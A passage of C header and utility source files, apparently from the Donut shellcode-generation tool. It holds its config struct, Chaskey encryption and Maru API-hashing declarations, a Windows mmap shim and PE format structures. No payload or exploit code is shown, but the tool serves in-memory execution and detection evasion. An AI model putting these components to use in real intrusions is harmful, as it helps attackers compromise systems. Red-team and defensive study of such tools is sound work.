353 uint64_t mod_len; // size of DONUT_MODULE
354 PDONUT_MODULE mod; // points to donut module
355
356 int inst_type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL
357 uint64_t inst_len; // size of DONUT_INSTANCE
358 PDONUT_INSTANCE inst; // points to donut instance
359
360 uint64_t pic_len; // size of shellcode
361 void* pic; // points to PIC/shellcode
362 } DONUT_CONFIG, *PDONUT_CONFIG;
363
364 #ifdef __cplusplus
365 extern "C" {
366 #endif
367
368 #ifdef DLL
369 #define EXPORT_FUNC __declspec(dllexport)
370 #else
371 #define EXPORT_FUNC
372 #endif
373
374 // public functions
375 EXPORT_FUNC int DonutCreate(PDONUT_CONFIG);
376 EXPORT_FUNC int DonutDelete(PDONUT_CONFIG);
377
378 #ifdef __cplusplus
379 }
380 #endif
381
382 #endif
+61
-0
include/encrypt.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef ENCRYPT_H
32 #define ENCRYPT_H
33
34 #include <stdint.h>
35 #include <stddef.h>
36
37 #ifndef ROTR32
38 #define ROTR32(v,n)(((v)>>(n))|((v)<<(32-(n))))
39 #endif
40
41 // CHASKEY block cipher
42 // 128-bit block with 128-bit key
43 #define ENCRYPT chaskey
44
45 #define CIPHER_BLK_LEN (128/8)
46 #define CIPHER_KEY_LEN (128/8)
47
48 #ifdef __cplusplus
49 extern "C" {
50 #endif
51
52 void donut_encrypt(void *mk, void *ctr, void *data, size_t len);
53
54 #define donut_decrypt(mk,ctr,data,len) donut_encrypt(mk,ctr,data,len)
55
56 #ifdef __cplusplus
57 }
58 #endif
59
60 #endif
+60
-0
include/hash.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2017 Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef MARU_H
32 #define MARU_H
33
34 #include <stdint.h>
35 #include <string.h>
36
37 void *Memset (void *ptr, int value, size_t num);
38
39 #define MARU_MAX_STR 64
40 #define MARU_BLK_LEN 16
41 #define MARU_HASH_LEN 8
42 #define MARU_IV_LEN MARU_HASH_LEN
43 #define MARU_CRYPT speck
44
45 #ifndef ROTR32
46 #define ROTR32(v,n)(((v)>>(n))|((v)<<(32-(n))))
47 #endif
48
49 #ifdef __cplusplus
50 extern "C" {
51 #endif
52
53 uint64_t maru(const void *api, uint64_t iv);
54
55 #ifdef __cplusplus
56 }
57 #endif
58
59 #endif
+74
-0
include/mmap-windows.c less more
0 /* mmap() replacement for Windows
1 *
2 * Author: Mike Frysinger <[email protected]>
3 * Placed into the public domain
4 */
5
6 /* References:
7 * CreateFileMapping: http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx
8 * CloseHandle: http://msdn.microsoft.com/en-us/library/ms724211(VS.85).aspx
9 * MapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366761(VS.85).aspx
10 * UnmapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366882(VS.85).aspx
11 */
12
13 #include "mmap.h"
14
15 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset)
16 {
17 if (prot & ~(PROT_READ | PROT_WRITE | PROT_EXEC))
18 return MAP_FAILED;
19 if (fd == -1) {
20 if (!(flags & MAP_ANON) || offset)
21 return MAP_FAILED;
22 } else if (flags & MAP_ANON)
23 return MAP_FAILED;
24
25 DWORD flProtect;
26 if (prot & PROT_WRITE) {
27 if (prot & PROT_EXEC)
28 flProtect = PAGE_EXECUTE_READWRITE;
29 else
30 flProtect = PAGE_READWRITE;
31 } else if (prot & PROT_EXEC) {
32 if (prot & PROT_READ)
33 flProtect = PAGE_EXECUTE_READ;
34 else if (prot & PROT_EXEC)
35 flProtect = PAGE_EXECUTE;
36 } else
37 flProtect = PAGE_READONLY;
38
39 off_t end = length + offset;
40 HANDLE mmap_fd, h;
41 if (fd == -1)
42 mmap_fd = INVALID_HANDLE_VALUE;
43 else
44 mmap_fd = (HANDLE)_get_osfhandle(fd);
45 h = CreateFileMapping(mmap_fd, NULL, flProtect, DWORD_HI(end), DWORD_LO(end), NULL);
46 if (h == NULL)
47 return MAP_FAILED;
48
49 DWORD dwDesiredAccess;
50 if (prot & PROT_WRITE)
51 dwDesiredAccess = FILE_MAP_WRITE;
52 else
53 dwDesiredAccess = FILE_MAP_READ;
54 if (prot & PROT_EXEC)
55 dwDesiredAccess |= FILE_MAP_EXECUTE;
56 if (flags & MAP_PRIVATE)
57 dwDesiredAccess |= FILE_MAP_COPY;
58 void *ret = MapViewOfFile(h, dwDesiredAccess, DWORD_HI(offset), DWORD_LO(offset), length);
59 if (ret == NULL) {
60 CloseHandle(h);
61 ret = MAP_FAILED;
62 }
63 return ret;
64 }
65
66 void munmap(void *addr, size_t length)
67 {
68 UnmapViewOfFile(addr);
69 /* ruh-ro, we leaked handle from CreateFileMapping() ... */
70 }
71
72 #undef DWORD_HI
73 #undef DWORD_LO
+45
-0
include/mmap.h less more
0
1
2 #ifndef MMAP_H
3 #define MMAP_H
4
5 #include <io.h>
6 #include <windows.h>
7 #include <sys/types.h>
8
9 #define PROT_READ 0x1
10 #define PROT_WRITE 0x2
11 /* This flag is only available in WinXP+ */
12 #ifdef FILE_MAP_EXECUTE
13 #define PROT_EXEC 0x4
14 #else
15 #define PROT_EXEC 0x0
16 #define FILE_MAP_EXECUTE 0
17 #endif
18
19 #define MAP_SHARED 0x01
20 #define MAP_PRIVATE 0x02
21 #define MAP_ANONYMOUS 0x20
22 #define MAP_ANON MAP_ANONYMOUS
23 #define MAP_FAILED ((void *) -1)
24
25 #ifdef __USE_FILE_OFFSET64
26 # define DWORD_HI(x) (x >> 32)
27 # define DWORD_LO(x) ((x) & 0xffffffff)
28 #else
29 # define DWORD_HI(x) (0)
30 # define DWORD_LO(x) (x)
31 #endif
32
33 #ifdef __cplusplus
34 extern "C" {
35 #endif
36
37 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset);
38 void munmap(void *addr, size_t length);
39
40 #ifdef __cplusplus
41 }
42 #endif
43
44 #endif
+441
-0
include/pe.h less more
0
1 #ifndef PE_H
2 #define PE_H
3
4 #include "wintypes.h"
5
6 //
7 // Image Format
8 //
9
10
11 #ifndef _MAC
12
13 #include "pshpack4.h" // 4 byte packing is the default
14
15 #define IMAGE_DOS_SIGNATURE 0x5A4D // MZ
16 #define IMAGE_OS2_SIGNATURE 0x454E // NE
17 #define IMAGE_OS2_SIGNATURE_LE 0x454C // LE
18 #define IMAGE_VXD_SIGNATURE 0x454C // LE
19 #define IMAGE_NT_SIGNATURE 0x00004550 // PE00
20
21 #include "pshpack2.h" // 16 bit headers are 2 byte packed
22
23 #else
24
25 #include "pshpack1.h"
26
27 #define IMAGE_DOS_SIGNATURE 0x4D5A // MZ
28 #define IMAGE_OS2_SIGNATURE 0x4E45 // NE
29 #define IMAGE_OS2_SIGNATURE_LE 0x4C45 // LE
30 #define IMAGE_NT_SIGNATURE 0x50450000 // PE00
31 #endif
32
33 typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header
34 WORD e_magic; // Magic number
35 WORD e_cblp; // Bytes on last page of file
36 WORD e_cp; // Pages in file
37 WORD e_crlc; // Relocations
38 WORD e_cparhdr; // Size of header in paragraphs
39 WORD e_minalloc; // Minimum extra paragraphs needed
40 WORD e_maxalloc; // Maximum extra paragraphs needed
41 WORD e_ss; // Initial (relative) SS value
42 WORD e_sp; // Initial SP value
43 WORD e_csum; // Checksum
44 WORD e_ip; // Initial IP value
45 WORD e_cs; // Initial (relative) CS value
46 WORD e_lfarlc; // File address of relocation table
47 WORD e_ovno; // Overlay number
48 WORD e_res[4]; // Reserved words
49 WORD e_oemid; // OEM identifier (for e_oeminfo)
50 WORD e_oeminfo; // OEM information; e_oemid specific
51 WORD e_res2[10]; // Reserved words
52 LONG e_lfanew; // File address of new exe header
53 } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;
54
55 #ifndef _MAC
56 #include "poppack.h" // Back to 4 byte packing
57 #endif
58
59 //
60 // File header format.
61 //
62
63 typedef struct _IMAGE_FILE_HEADER {
64 WORD Machine;
65 WORD NumberOfSections;
66 DWORD TimeDateStamp;
67 DWORD PointerToSymbolTable;
68 DWORD NumberOfSymbols;
69 WORD SizeOfOptionalHeader;
70 WORD Characteristics;
71 } IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;
72
73 #define IMAGE_SIZEOF_FILE_HEADER 20
74
75 #define IMAGE_FILE_RELOCS_STRIPPED 0x0001 // Relocation info stripped from file.
76 #define IMAGE_FILE_EXECUTABLE_IMAGE 0x0002 // File is executable (i.e. no unresolved externel references).
77 #define IMAGE_FILE_LINE_NUMS_STRIPPED 0x0004 // Line nunbers stripped from file.
78 #define IMAGE_FILE_LOCAL_SYMS_STRIPPED 0x0008 // Local symbols stripped from file.
79 #define IMAGE_FILE_AGGRESIVE_WS_TRIM 0x0010 // Agressively trim working set
80 #define IMAGE_FILE_LARGE_ADDRESS_AWARE 0x0020 // App can handle >2gb addresses
81 #define IMAGE_FILE_BYTES_REVERSED_LO 0x0080 // Bytes of machine word are reversed.
82 #define IMAGE_FILE_32BIT_MACHINE 0x0100 // 32 bit word machine.
83 #define IMAGE_FILE_DEBUG_STRIPPED 0x0200 // Debugging info stripped from file in .DBG file
84 #define IMAGE_FILE_REMOVABLE_RUN_FROM_SWAP 0x0400 // If Image is on removable media, copy and run from the swap file.
85 #define IMAGE_FILE_NET_RUN_FROM_SWAP 0x0800 // If Image is on Net, copy and run from the swap file.
86 #define IMAGE_FILE_SYSTEM 0x1000 // System File.
87 #define IMAGE_FILE_DLL 0x2000 // File is a DLL.
88 #define IMAGE_FILE_UP_SYSTEM_ONLY 0x4000 // File should only be run on a UP machine
89 #define IMAGE_FILE_BYTES_REVERSED_HI 0x8000 // Bytes of machine word are reversed.
90
91 #define IMAGE_FILE_MACHINE_UNKNOWN 0
92 #define IMAGE_FILE_MACHINE_I386 0x014c // Intel 386.
93 #define IMAGE_FILE_MACHINE_R3000 0x0162 // MIPS little-endian, 0x160 big-endian
94 #define IMAGE_FILE_MACHINE_R4000 0x0166 // MIPS little-endian
95 #define IMAGE_FILE_MACHINE_R10000 0x0168 // MIPS little-endian
96 #define IMAGE_FILE_MACHINE_WCEMIPSV2 0x0169 // MIPS little-endian WCE v2
97 #define IMAGE_FILE_MACHINE_ALPHA 0x0184 // Alpha_AXP
98 #define IMAGE_FILE_MACHINE_SH3 0x01a2 // SH3 little-endian
99 #define IMAGE_FILE_MACHINE_SH3DSP 0x01a3
100 #define IMAGE_FILE_MACHINE_SH3E 0x01a4 // SH3E little-endian
101 #define IMAGE_FILE_MACHINE_SH4 0x01a6 // SH4 little-endian
102 #define IMAGE_FILE_MACHINE_SH5 0x01a8 // SH5
103 #define IMAGE_FILE_MACHINE_ARM 0x01c0 // ARM Little-Endian
104 #define IMAGE_FILE_MACHINE_THUMB 0x01c2
105 #define IMAGE_FILE_MACHINE_AM33 0x01d3
106 #define IMAGE_FILE_MACHINE_POWERPC 0x01F0 // IBM PowerPC Little-Endian
107 #define IMAGE_FILE_MACHINE_POWERPCFP 0x01f1
108 #define IMAGE_FILE_MACHINE_IA64 0x0200 // Intel 64
109 #define IMAGE_FILE_MACHINE_MIPS16 0x0266 // MIPS
110 #define IMAGE_FILE_MACHINE_ALPHA64 0x0284 // ALPHA64
111 #define IMAGE_FILE_MACHINE_MIPSFPU 0x0366 // MIPS
112 #define IMAGE_FILE_MACHINE_MIPSFPU16 0x0466 // MIPS
113 #define IMAGE_FILE_MACHINE_AXP64 IMAGE_FILE_MACHINE_ALPHA64
114 #define IMAGE_FILE_MACHINE_TRICORE 0x0520 // Infineon
115 #define IMAGE_FILE_MACHINE_CEF 0x0CEF
116 #define IMAGE_FILE_MACHINE_EBC 0x0EBC // EFI Byte Code
117 #define IMAGE_FILE_MACHINE_AMD64 0x8664 // AMD64 (K8)
118 #define IMAGE_FILE_MACHINE_M32R 0x9041 // M32R little-endian
119 #define IMAGE_FILE_MACHINE_CEE 0xC0EE
120
121 //
122 // Directory format.
123 //
124
125 typedef struct _IMAGE_DATA_DIRECTORY {
126 DWORD VirtualAddress;
127 DWORD Size;
128 } IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY;
129
130 #define IMAGE_NUMBEROF_DIRECTORY_ENTRIES 16
131
132 //
133 // Optional header format.
134 //
135
136 typedef struct _IMAGE_OPTIONAL_HEADER {
137 //
138 // Standard fields.
139 //
140
141 WORD Magic;
142 BYTE MajorLinkerVersion;
143 BYTE MinorLinkerVersion;
144 DWORD SizeOfCode;
145 DWORD SizeOfInitializedData;
146 DWORD SizeOfUninitializedData;
147 DWORD AddressOfEntryPoint;
148 DWORD BaseOfCode;
149 DWORD BaseOfData;
150
151 //
152 // NT additional fields.
153 //
154
155 DWORD ImageBase;
156 DWORD SectionAlignment;
157 DWORD FileAlignment;
158 WORD MajorOperatingSystemVersion;
159 WORD MinorOperatingSystemVersion;
160 WORD MajorImageVersion;
161 WORD MinorImageVersion;
162 WORD MajorSubsystemVersion;
163 WORD MinorSubsystemVersion;
164 DWORD Win32VersionValue;
165 DWORD SizeOfImage;
166 DWORD SizeOfHeaders;
167 DWORD CheckSum;
168 WORD Subsystem;
169 WORD DllCharacteristics;
170 DWORD SizeOfStackReserve;
171 DWORD SizeOfStackCommit;
172 DWORD SizeOfHeapReserve;
173 DWORD SizeOfHeapCommit;
174 DWORD LoaderFlags;
175 DWORD NumberOfRvaAndSizes;
176 IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
177 } IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32;
178
179 typedef struct _IMAGE_OPTIONAL_HEADER64 {
180 WORD Magic;
181 BYTE MajorLinkerVersion;
182 BYTE MinorLinkerVersion;
183 DWORD SizeOfCode;
184 DWORD SizeOfInitializedData;
185 DWORD SizeOfUninitializedData;
186 DWORD AddressOfEntryPoint;
187 DWORD BaseOfCode;
188 ULONGLONG ImageBase;
189 DWORD SectionAlignment;
190 DWORD FileAlignment;
191 WORD MajorOperatingSystemVersion;
192 WORD MinorOperatingSystemVersion;
193 WORD MajorImageVersion;
194 WORD MinorImageVersion;
195 WORD MajorSubsystemVersion;
196 WORD MinorSubsystemVersion;
197 DWORD Win32VersionValue;
198 DWORD SizeOfImage;
199 DWORD SizeOfHeaders;
200 DWORD CheckSum;
201 WORD Subsystem;
202 WORD DllCharacteristics;
203 ULONGLONG SizeOfStackReserve;
204 ULONGLONG SizeOfStackCommit;
205 ULONGLONG SizeOfHeapReserve;
206 ULONGLONG SizeOfHeapCommit;
207 DWORD LoaderFlags;
208 DWORD NumberOfRvaAndSizes;
209 IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
210 } IMAGE_OPTIONAL_HEADER64, *PIMAGE_OPTIONAL_HEADER64;
211
212 #define IMAGE_NT_OPTIONAL_HDR32_MAGIC 0x10b
213 #define IMAGE_NT_OPTIONAL_HDR64_MAGIC 0x20b
214 #define IMAGE_ROM_OPTIONAL_HDR_MAGIC 0x107
215
216 #ifdef _WIN64
217 typedef IMAGE_OPTIONAL_HEADER64 IMAGE_OPTIONAL_HEADER;
218 typedef PIMAGE_OPTIONAL_HEADER64 PIMAGE_OPTIONAL_HEADER;
219 #define IMAGE_NT_OPTIONAL_HDR_MAGIC IMAGE_NT_OPTIONAL_HDR64_MAGIC
220 #else
221 typedef IMAGE_OPTIONAL_HEADER32 IMAGE_OPTIONAL_HEADER;
222 typedef PIMAGE_OPTIONAL_HEADER32 PIMAGE_OPTIONAL_HEADER;
223 #define IMAGE_NT_OPTIONAL_HDR_MAGIC IMAGE_NT_OPTIONAL_HDR32_MAGIC
224 #endif
225
226 typedef struct _IMAGE_NT_HEADERS64 {
227 DWORD Signature;
228 IMAGE_FILE_HEADER FileHeader;
229 IMAGE_OPTIONAL_HEADER64 OptionalHeader;
230 } IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;
231
232 typedef struct _IMAGE_NT_HEADERS {
233 DWORD Signature;
234 IMAGE_FILE_HEADER FileHeader;
235 IMAGE_OPTIONAL_HEADER32 OptionalHeader;
236 } IMAGE_NT_HEADERS32, *PIMAGE_NT_HEADERS32;
237
238 #if defined(_WIN32)
239 typedef IMAGE_NT_HEADERS32 IMAGE_NT_HEADERS;
240 typedef PIMAGE_NT_HEADERS32 PIMAGE_NT_HEADERS;
241 #else
242 typedef IMAGE_NT_HEADERS64 IMAGE_NT_HEADERS;
243 typedef PIMAGE_NT_HEADERS64 PIMAGE_NT_HEADERS;
244 #endif
245
246 // IMAGE_FIRST_SECTION doesn't need 32/64 versions since the file header is the same either way.
247
248 #define IMAGE_FIRST_SECTION( ntheader ) ((PIMAGE_SECTION_HEADER) \
249 ((ULONG_PTR)(ntheader) + \
250 offsetof( IMAGE_NT_HEADERS, OptionalHeader ) + \
251 ((ntheader))->FileHeader.SizeOfOptionalHeader \
252 ))
253
254 // Subsystem Values
255
256 #define IMAGE_SUBSYSTEM_UNKNOWN 0 // Unknown subsystem.
257 #define IMAGE_SUBSYSTEM_NATIVE 1 // Image doesn't require a subsystem.
258 #define IMAGE_SUBSYSTEM_WINDOWS_GUI 2 // Image runs in the Windows GUI subsystem.
259 #define IMAGE_SUBSYSTEM_WINDOWS_CUI 3 // Image runs in the Windows character subsystem.
260 #define IMAGE_SUBSYSTEM_OS2_CUI 5 // image runs in the OS/2 character subsystem.
261 #define IMAGE_SUBSYSTEM_POSIX_CUI 7 // image runs in the Posix character subsystem.
262 #define IMAGE_SUBSYSTEM_NATIVE_WINDOWS 8 // image is a native Win9x driver.
263 #define IMAGE_SUBSYSTEM_WINDOWS_CE_GUI 9 // Image runs in the Windows CE subsystem.
264 #define IMAGE_SUBSYSTEM_EFI_APPLICATION 10 //
265 #define IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER 11 //
266 #define IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER 12 //
267 #define IMAGE_SUBSYSTEM_EFI_ROM 13
268 #define IMAGE_SUBSYSTEM_XBOX 14
269 #define IMAGE_SUBSYSTEM_WINDOWS_BOOT_APPLICATION 16
270
271 // DllCharacteristics Entries
272
273 // IMAGE_LIBRARY_PROCESS_INIT 0x0001 // Reserved.
274 // IMAGE_LIBRARY_PROCESS_TERM 0x0002 // Reserved.
275 // IMAGE_LIBRARY_THREAD_INIT 0x0004 // Reserved.
276 // IMAGE_LIBRARY_THREAD_TERM 0x0008 // Reserved.
277 #define IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE 0x0040 // DLL can move.
278 #define IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY 0x0080 // Code Integrity Image
279 #define IMAGE_DLLCHARACTERISTICS_NX_COMPAT 0x0100 // Image is NX compatible
280 #define IMAGE_DLLCHARACTERISTICS_NO_ISOLATION 0x0200 // Image understands isolation and doesn't want it
281 #define IMAGE_DLLCHARACTERISTICS_NO_SEH 0x0400 // Image does not use SEH. No SE handler may reside in this image
282 #define IMAGE_DLLCHARACTERISTICS_NO_BIND 0x0800 // Do not bind this image.
283 // 0x1000 // Reserved.
284 #define IMAGE_DLLCHARACTERISTICS_WDM_DRIVER 0x2000 // Driver uses WDM model
285 // 0x4000 // Reserved.
286 #define IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE 0x8000
287
288 // Directory Entries
289
290 #define IMAGE_DIRECTORY_ENTRY_EXPORT 0 // Export Directory
291 #define IMAGE_DIRECTORY_ENTRY_IMPORT 1 // Import Directory
292 #define IMAGE_DIRECTORY_ENTRY_RESOURCE 2 // Resource Directory
293 #define IMAGE_DIRECTORY_ENTRY_EXCEPTION 3 // Exception Directory
294 #define IMAGE_DIRECTORY_ENTRY_SECURITY 4 // Security Directory
295 #define IMAGE_DIRECTORY_ENTRY_BASERELOC 5 // Base Relocation Table
296 #define IMAGE_DIRECTORY_ENTRY_DEBUG 6 // Debug Directory
297 // IMAGE_DIRECTORY_ENTRY_COPYRIGHT 7 // (X86 usage)
298 #define IMAGE_DIRECTORY_ENTRY_ARCHITECTURE 7 // Architecture Specific Data
299 #define IMAGE_DIRECTORY_ENTRY_GLOBALPTR 8 // RVA of GP
300 #define IMAGE_DIRECTORY_ENTRY_TLS 9 // TLS Directory
301 #define IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG 10 // Load Configuration Directory
302 #define IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT 11 // Bound Import Directory in headers
303 #define IMAGE_DIRECTORY_ENTRY_IAT 12 // Import Address Table
304 #define IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT 13 // Delay Load Import Descriptors
305 #define IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 14 // COM Runtime descriptor
306
307 //
308 // Section header format.
309 //
310
311 #define IMAGE_SIZEOF_SHORT_NAME 8
312
313 typedef struct _IMAGE_SECTION_HEADER {
314 BYTE Name[IMAGE_SIZEOF_SHORT_NAME];
315 union {
316 DWORD PhysicalAddress;
317 DWORD VirtualSize;
318 } Misc;
319 DWORD VirtualAddress;
320 DWORD SizeOfRawData;
321 DWORD PointerToRawData;
322 DWORD PointerToRelocations;
323 DWORD PointerToLinenumbers;
324 WORD NumberOfRelocations;
325 WORD NumberOfLinenumbers;
326 DWORD Characteristics;
327 } IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;
328
329 #define IMAGE_SIZEOF_SECTION_HEADER 40
330
331 //
332 // Section characteristics.
333 //
334 // IMAGE_SCN_TYPE_REG 0x00000000 // Reserved.
335 // IMAGE_SCN_TYPE_DSECT 0x00000001 // Reserved.
336 // IMAGE_SCN_TYPE_NOLOAD 0x00000002 // Reserved.
337 // IMAGE_SCN_TYPE_GROUP 0x00000004 // Reserved.
338 #define IMAGE_SCN_TYPE_NO_PAD 0x00000008 // Reserved.
339 // IMAGE_SCN_TYPE_COPY 0x00000010 // Reserved.
340
341 #define IMAGE_SCN_CNT_CODE 0x00000020 // Section contains code.
342 #define IMAGE_SCN_CNT_INITIALIZED_DATA 0x00000040 // Section contains initialized data.
343 #define IMAGE_SCN_CNT_UNINITIALIZED_DATA 0x00000080 // Section contains uninitialized data.
344
345 #define IMAGE_SCN_LNK_OTHER 0x00000100 // Reserved.
346 #define IMAGE_SCN_LNK_INFO 0x00000200 // Section contains comments or some other type of information.
347 // IMAGE_SCN_TYPE_OVER 0x00000400 // Reserved.
348 #define IMAGE_SCN_LNK_REMOVE 0x00000800 // Section contents will not become part of image.
349 #define IMAGE_SCN_LNK_COMDAT 0x00001000 // Section contents comdat.
350 // 0x00002000 // Reserved.
351 // IMAGE_SCN_MEM_PROTECTED - Obsolete 0x00004000
352 #define IMAGE_SCN_NO_DEFER_SPEC_EXC 0x00004000 // Reset speculative exceptions handling bits in the TLB entries for this section.
353 #define IMAGE_SCN_GPREL 0x00008000 // Section content can be accessed relative to GP
354 #define IMAGE_SCN_MEM_FARDATA 0x00008000
355 // IMAGE_SCN_MEM_SYSHEAP - Obsolete 0x00010000
356 #define IMAGE_SCN_MEM_PURGEABLE 0x00020000
357 #define IMAGE_SCN_MEM_16BIT 0x00020000
358 #define IMAGE_SCN_MEM_LOCKED 0x00040000
359 #define IMAGE_SCN_MEM_PRELOAD 0x00080000
360
361 #define IMAGE_SCN_ALIGN_1BYTES 0x00100000 //
362 #define IMAGE_SCN_ALIGN_2BYTES 0x00200000 //
363 #define IMAGE_SCN_ALIGN_4BYTES 0x00300000 //
364 #define IMAGE_SCN_ALIGN_8BYTES 0x00400000 //
365 #define IMAGE_SCN_ALIGN_16BYTES 0x00500000 // Default alignment if no others are specified.
366 #define IMAGE_SCN_ALIGN_32BYTES 0x00600000 //
367 #define IMAGE_SCN_ALIGN_64BYTES 0x00700000 //
368 #define IMAGE_SCN_ALIGN_128BYTES 0x00800000 //
369 #define IMAGE_SCN_ALIGN_256BYTES 0x00900000 //
370 #define IMAGE_SCN_ALIGN_512BYTES 0x00A00000 //
371 #define IMAGE_SCN_ALIGN_1024BYTES 0x00B00000 //
372 #define IMAGE_SCN_ALIGN_2048BYTES 0x00C00000 //
373 #define IMAGE_SCN_ALIGN_4096BYTES 0x00D00000 //
374 #define IMAGE_SCN_ALIGN_8192BYTES 0x00E00000 //
375 // Unused 0x00F00000
376 #define IMAGE_SCN_ALIGN_MASK 0x00F00000
377
378 #define IMAGE_SCN_LNK_NRELOC_OVFL 0x01000000 // Section contains extended relocations.
379 #define IMAGE_SCN_MEM_DISCARDABLE 0x02000000 // Section can be discarded.
380 #define IMAGE_SCN_MEM_NOT_CACHED 0x04000000 // Section is not cachable.
381 #define IMAGE_SCN_MEM_NOT_PAGED 0x08000000 // Section is not pageable.
382 #define IMAGE_SCN_MEM_SHARED 0x10000000 // Section is shareable.
383 #define IMAGE_SCN_MEM_EXECUTE 0x20000000 // Section is executable.
384 #define IMAGE_SCN_MEM_READ 0x40000000 // Section is readable.
385 #define IMAGE_SCN_MEM_WRITE 0x80000000 // Section is writeable.
386
387 typedef struct IMAGE_COR20_HEADER
388 {
389 // Header versioning
390 DWORD cb;
391 WORD MajorRuntimeVersion;
392 WORD MinorRuntimeVersion;
393
394 // Symbol table and startup information
395 IMAGE_DATA_DIRECTORY MetaData;
396 DWORD Flags;
397
398 // The main program if it is an EXE (not used if a DLL?)
399 // If COMIMAGE_FLAGS_NATIVE_ENTRYPOINT is not set, EntryPointToken represents a managed entrypoint.
400 // If COMIMAGE_FLAGS_NATIVE_ENTRYPOINT is set, EntryPointRVA represents an RVA to a native entrypoint
401 // (deprecated for DLLs, use modules constructors instead).
402 union {
403 DWORD EntryPointToken;
404 DWORD EntryPointRVA;
405 };
406
407 // This is the blob of managed resources. Fetched using code:AssemblyNative.GetResource and
408 // code:PEFile.GetResource and accessible from managed code from
409 // System.Assembly.GetManifestResourceStream. The meta data has a table that maps names to offsets into
410 // this blob, so logically the blob is a set of resources.
411 IMAGE_DATA_DIRECTORY Resources;
412 // IL assemblies can be signed with a public-private key to validate who created it. The signature goes
413 // here if this feature is used.
414 IMAGE_DATA_DIRECTORY StrongNameSignature;
415
416 IMAGE_DATA_DIRECTORY CodeManagerTable; // Deprecated, not used
417 // Used for manged codee that has unmaanaged code inside it (or exports methods as unmanaged entry points)
418 IMAGE_DATA_DIRECTORY VTableFixups;
419 IMAGE_DATA_DIRECTORY ExportAddressTableJumps;
420
421 // null for ordinary IL images. NGEN images it points at a code:CORCOMPILE_HEADER structure
422 IMAGE_DATA_DIRECTORY ManagedNativeHeader;
423
424 } IMAGE_COR20_HEADER, *PIMAGE_COR20_HEADER;
